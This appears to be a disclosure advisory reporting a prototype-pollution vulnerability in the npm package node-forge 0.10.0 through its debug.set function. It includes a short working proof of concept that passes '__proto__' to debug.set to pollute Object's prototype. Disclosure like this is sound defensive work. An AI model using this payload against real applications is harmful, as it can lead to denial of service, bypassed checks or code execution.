node-forge

vulnerability prototype pollution
severity 7.3
language javascript
registry npm

✍️ Description

The node-forge is found subject to a potential prototype pollution security issue when calling debug.set function with unsafe inputs. Despite the node-forge has already understood the risk of prototype pollution for the function util.setPath and removed it in the latest version 0.10.0 (see https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md), they still overlooked another risky entry in debug.set.

🕵️‍♂️ Proof of Concept

// PoC.js
forge = require('node-forge'); // version at 0.10.0
console.log("Before: " + {}.polluted); // undefined
forge.debug.set('__proto__', 'polluted', 'HACKED');
console.log("After: " + {}.polluted); // HACKED

💥 Impact

This vulnerability is capable of polluting Object's prototypes and possibly leading to many kinds of attacks such as the denial-of-service, checking bypass, or potentially code execution.

References